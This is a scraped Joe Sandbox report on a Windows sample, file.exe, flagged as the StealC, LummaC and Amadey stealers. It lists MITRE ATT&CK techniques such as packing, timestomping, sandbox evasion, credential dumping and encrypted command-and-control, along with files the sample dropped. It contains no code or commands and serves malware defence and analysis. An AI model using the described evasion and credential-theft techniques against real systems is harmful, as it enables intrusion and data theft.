Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKKFHIEGDHJKECAAKKEB

C:\ProgramData\ECBGHCGC

C:\ProgramData\EHJKKKFIIJJKJKFIECBF

C:\ProgramData\IECGHJKK

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4fe110f830.exe.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\409e5a72-ff79-4363-81de-5cc440c5bc27.tmp

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre